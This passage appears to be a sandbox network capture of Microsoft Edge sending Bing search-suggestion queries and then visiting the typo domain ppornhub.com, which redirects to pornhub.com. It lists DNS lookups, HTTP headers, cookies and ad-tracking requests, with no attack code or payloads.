Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 139
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701636ebd5a466e9e92652a2af71689
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-szAILL3k/kKMJ1e7Ri7B4kEgIGir4dFRX/xM55ZXxko='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:03:58 GMT
Connection: keep-alive
Set-Cookie: MUID=125A908E31786CD20DFF858130E46D25; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=125A908E31786CD20DFF858130E46D25; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=1FF172B571BD6C2D34FB67BA70216DD8; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=874F329457044599983DCB55F98C4346&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=1FF172B571BD6C2D34FB67BA70216DD8; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144238.1034535c
GET

https://www.bing.com/qbox?query=ppornhub.com&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=4b2e0898202645459f02eb5dbf589ea4&oit=3&cp=12&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=ppornhub.com&language=en-US&pt=EdgBox&cvid=02bcc1d54a1b47799c7d1093d1646595&ig=4b2e0898202645459f02eb5dbf589ea4&oit=3&cp=12&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 140
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 6701636e5b6b408d99127d9676e43cbd
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-KGUOP+3ZJ4jJ3r9d6rTKZvpU4r/dwus0X1xLKLRfkKw='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:03:58 GMT
Connection: keep-alive
Set-Cookie: MUID=299249589B2868CE2B785C579A576928; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=299249589B2868CE2B785C579A576928; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=0691BBB2FB93647C3E23AEBDFAEC657D; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=09CF0C8CDCF74E9EAB1AEFE270CC1D7F&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:03:58 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=0691BBB2FB93647C3E23AEBDFAEC657D; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144238.1034567b
GET

https://www.bing.com/qbox?query=p&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=50e3f341f71b4c1dbc9711feeccfcd4d&oit=1&cp=1&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=p&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=50e3f341f71b4c1dbc9711feeccfcd4d&oit=1&cp=1&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 422
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163be271d4810a0ebfc7125be6346
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-6KTm6P0dgv2t6qTbVBMFQjR3YpOum9oHLRKmsLnNqrc='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:18 GMT
Connection: keep-alive
Set-Cookie: MUID=04A621BEBA1361E73B7C34B1BB8F609E; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=04A621BEBA1361E73B7C34B1BB8F609E; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=050DCD69B0206909399BD866B1BC6817; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=4D621FB1A973401EB99632BA969803AD&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=050DCD69B0206909399BD866B1BC6817; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144318.10345851
GET

https://www.bing.com/qbox?query=po&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b62567e2f5ed4cf68b148c0479257a6c&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=po&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b62567e2f5ed4cf68b148c0479257a6c&oit=1&cp=2&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 442
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163beb7d9481c931bb1e08d55dfd8
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ujpLxEPA/4ae3RZyPimndBrZ37yrQja8KlJUHRVABQ0='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:18 GMT
Connection: keep-alive
Set-Cookie: MUID=17C22FACE717633300733AA3E63D6253; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=17C22FACE717633300733AA3E63D6253; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=3688E988A8EC65813E72FC87A9C6647A; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=B9F57A368F3243878CA5D7B947ECEF14&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:18 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=3688E988A8EC65813E72FC87A9C6647A; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.c3777b5c.1728144318.10368b97
GET

https://www.bing.com/qbox?query=por&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=e244ed960967462cbcfcb893d04e7e3c&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

92.123.128.135:443

Request

GET /qbox?query=por&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=e244ed960967462cbcfcb893d04e7e3c&oit=1&cp=3&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
DNS

ppornhub.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ppornhub.com

IN A

Response

ppornhub.com

IN A

66.254.114.210
GET

http://ppornhub.com/

msedge.exe

Remote address:

66.254.114.210:80

Request

GET / HTTP/1.1
Host: ppornhub.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 301 Moved Permanently

server: nginx
date: Sat, 05 Oct 2024 16:03:59 GMT
content-type: text/html
content-length: 162
location: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
via: 1.1 google
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
DNS

www.pornhub.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.pornhub.com

IN A

Response

www.pornhub.com

IN CNAME

pornhub.com

pornhub.com

IN A

66.254.114.41
GET

https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects HTTP/2.0
host: www.pornhub.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:03:59 GMT
content-type: text/html; charset=UTF-8
set-cookie: platform=pc; expires=Sat, 12 Oct 2024 16:03:59 GMT; Max-Age=604800; path=/; domain=pornhub.com; secure
set-cookie: ss=418890743901696020; expires=Sun, 05 Oct 2025 16:03:59 GMT; Max-Age=31536000; path=/; domain=pornhub.com; secure
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
set-cookie: __s=6701636F-42FE722901BB38B09A-3E717A; Secure; Samesite=None
set-cookie: __l=6701636F-42FE722901BB38B09A-3E717A; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A

Response

HTTP/2.0 202

server: nginx
date: Sat, 05 Oct 2024 16:04:00 GMT
content-length: 0
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_page_type]=home&channel[info]=%7B%22actor_id%22%3Anull%2C%22content_type%22%3Anull%2C%22video_id%22%3Anull%2C%22timestamp%22%3A1728144239%2C%22hash%22%3A%22eb4d2ac0f4a02bb9679bbebad75f6582%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=8EFE4FB5-4C03-49C6-843F-FFAFD4310E98&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2184351%7D%5D%7D%5D&noc=1&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:00 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/_i?type=event&event=consent-modal-open&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /_i?type=event&event=consent-modal-open&origin=homepage&origin_url=%2F%3Futm_source%3DPPORNHUB.COM%26amp%3Butm_medium%3Dredirects%26amp%3Butm_campaign%3Dtldredirects HTTP/2.0
host: www.pornhub.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/?utm_source=PPORNHUB.COM&utm_medium=redirects&utm_campaign=tldredirects
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: cookieConsent=1

Response

HTTP/2.0 200

content-length: 0
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/front/menu_livesex?segment=straight&token=MTcyODE0NDIzOSF8n2IMWltZaG_xaKfO_ibIU3KMyD7YQvP1qPpuHcmE4OsBbjW5Eiv5ul10fk6Sgwj5HbDXugrvdggLVPSxuSQ.

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /front/menu_livesex?segment=straight&token=MTcyODE0NDIzOSF8n2IMWltZaG_xaKfO_ibIU3KMyD7YQvP1qPpuHcmE4OsBbjW5Eiv5ul10fk6Sgwj5HbDXugrvdggLVPSxuSQ. HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
